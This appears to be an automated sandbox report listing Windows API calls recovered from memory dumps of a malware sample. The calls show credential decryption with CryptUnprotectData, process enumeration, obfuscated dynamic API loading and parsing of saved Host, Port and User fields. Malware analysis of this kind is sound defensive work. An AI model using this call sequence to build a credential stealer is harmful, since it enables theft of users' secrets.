                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 022D98C3
                                          • CloseHandle.KERNEL32(00420ACA), ref: 022D98E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction ID: 429a59aad541c256cfc531b9853980317b8ec721394f83a157364932b40ad3ee
                                          • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction Fuzzy Hash: F401E9B9A60208FFDB20DFE4C954BEDB7F9EF49700F004189A505E6244D7759A80CF51
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                          • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                          • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                          • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                          • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                          APIs
                                          • CryptBinaryToStringA.CRYPT32(00000000,022C53EB,40000001,00000000,00000000,?,022C53EB), ref: 022D9127
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction ID: aadf5fdad102bed8721f4076c83f969945bfe19a3c71554fdb49bb5efa915dad
                                          • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction Fuzzy Hash: 3711EC74224205BFDB00CF94DC89FAB33AAEF89754F009558F9198B264D775E882DB60
                                          APIs
                                          • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                          • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022C5155,00000000,00000000), ref: 022C9D56
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,022C5155,00000000,?), ref: 022C9D68
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022C5155,00000000,00000000), ref: 022C9D91
                                          • LocalFree.KERNEL32(?,?,?,?,022C5155,00000000,?), ref: 022C9DA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptLocalString$AllocFree
                                          • String ID:
                                          • API String ID: 4291131564-0
                                          • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction ID: 88d40f9036e13e7ae4e37eb3a35a30b07cce2eb71b1fb1b835963c9dd6ef974e
                                          • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction Fuzzy Hash: 2311A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208158FD159B394C776AA41CB90
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022C9DEB
                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 022C9E0A
                                          • memcpy.MSVCRT(?,?,?), ref: 022C9E2D
                                          • LocalFree.KERNEL32(?), ref: 022C9E3A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                          • String ID:
                                          • API String ID: 3243516280-0
                                          • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction ID: 9f5ae195d5ca2901506f4538f9245252ff31a187e1d59f5240a71f929aaaba9a
                                          • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction Fuzzy Hash: 051109B8A00209EFDB04CFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                          • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                          • LocalFree.KERNEL32(?), ref: 00409BD3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                          • String ID:
                                          • API String ID: 3243516280-0
                                          • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                          • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007995F8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,007995F8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007995F8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                          • wsprintfA.USER32 ref: 00417AB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                          • String ID:
                                          • API String ID: 362916592-0
                                          • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                          • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                          APIs
                                          • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID:
                                          • API String ID: 123533781-0
                                          • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                          • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                          • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                          • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction ID: 100971aef7525d68245288f379f508fe19e431bc75f3600e95acdc478f3563cd
                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction Fuzzy Hash: E0314BB6910609DFDB20CF99C880BADBBF5FF48724F24414AD445A7214D7B1EA45CFA4
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022CF985
                                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 022CF9D6
                                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 022CF9EC
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CFD18
                                          • FindClose.KERNEL32(000000FF), ref: 022CFD2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                          • Instruction ID: 8b05aea4d7f1281b91906bb7a0ea4e3655d441f12d8cd410d651615d804676b0
                                          • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                          • Instruction Fuzzy Hash: 0011AC31820B4CABCB28EBE0ED54EED7336AF20300F5047AAA50A56195EF342B49CF41
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022DD156
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                          • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                          • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmp, Offset: 00769000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_769000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction ID: b348b3ea97f0f7fd3cf77673d7fe40d95b0945890acdc515df74724b0cf7ee3b
                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction Fuzzy Hash: 49117072340201EFDB44DF55DC81FA673EEEB89360B298069EE05CB316E679E802C760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction ID: 36e94ec375f8e3efdc814eb16f37a99f8bc429ae1088de275c298cd7d9e6d9d7
                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction Fuzzy Hash: AB01F772620600CFDF21CFA0C804FAA33E9EB86205F1541A8E90697245E370AA418B90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                          • Instruction ID: 88e92da0b463ef236bd56cf16ee9d513761a5c2ce8e3227b2dcf879ded170889
                                          • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                          • Instruction Fuzzy Hash: 8271D333471B80EBD76B3BB1DD01E8A7AA3BF04702F104924B1DB29574DEB26865AF51
                                          APIs
                                          • GetProcAddress.KERNEL32(0064A8B0,X~v), ref: 022D9B08
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022D9B21
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022D9B39
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022D9B51
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022D9B6A
                                          • GetProcAddress.KERNEL32(0064A8B0, Nv), ref: 022D9B82
                                          • GetProcAddress.KERNEL32(0064A8B0,Hv), ref: 022D9B9A
                                          • GetProcAddress.KERNEL32(0064A8B0,(Iv), ref: 022D9BB3
                                          • GetProcAddress.KERNEL32(0064A8B0,~v), ref: 022D9BCB
                                          • GetProcAddress.KERNEL32(0064A8B0,p~v), ref: 022D9BE3
                                          • GetProcAddress.KERNEL32(0064A8B0,H+y), ref: 022D9BFC
                                          • GetProcAddress.KERNEL32(0064A8B0,h,y), ref: 022D9C14
                                          • GetProcAddress.KERNEL32(0064A8B0,(Jv), ref: 022D9C2C
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022D9C45
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022D9C5D
                                          • GetProcAddress.KERNEL32(0064A8B0,Gv), ref: 022D9C75
                                          • GetProcAddress.KERNEL32(0064A8B0, ,y), ref: 022D9C8E
                                          • GetProcAddress.KERNEL32(0064A8B0,P,y), ref: 022D9CA6
                                          • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022D9CBE
                                          • GetProcAddress.KERNEL32(0064A8B0,8,y), ref: 022D9CD7
                                          • GetProcAddress.KERNEL32(0064A8B0,HGv), ref: 022D9CEF
                                          • LoadLibraryA.KERNEL32(0064A550,?,022D6C67), ref: 022D9D01
                                          • LoadLibraryA.KERNEL32(0064A17C,?,022D6C67), ref: 022D9D12
                                          • LoadLibraryA.KERNEL32(0064A104,?,022D6C67), ref: 022D9D24
                                          • LoadLibraryA.KERNEL32(0064A1DC,?,022D6C67), ref: 022D9D36
                                          • LoadLibraryA.KERNEL32(*y,?,022D6C67), ref: 022D9D47
                                          • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022D9D69
                                          • GetProcAddress.KERNEL32(0064A7F4,X*y), ref: 022D9D8A
                                          • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022D9DA2
                                          • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022D9DC4
                                          • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022D9DE5
                                          • GetProcAddress.KERNEL32(0064A7D8,`Ov), ref: 022D9E06
                                          • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022D9E1D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: ,y$ Nv$(Iv$(Jv$8,y$H+y$HGv$P,y$X*y$X~v$`Ov$h,y$p~v$*y$Gv$Hv$~v
                                          • API String ID: 2238633743-2688192148
                                          • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction ID: 38d190d8190dadb7c56e45418f143c9fc8f2f9f840f3c461720b2d8101f17662
                                          • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                          • Instruction Fuzzy Hash: 4EA13BBD5D0240BFE364EFE8ED889A63BFBF74E201714661AF605C3264D639A441DB12
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • strtok_s.MSVCRT ref: 0041031B
                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                          • lstrlenA.KERNEL32(00000000), ref: 00410393
                                            • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                            • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                          • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
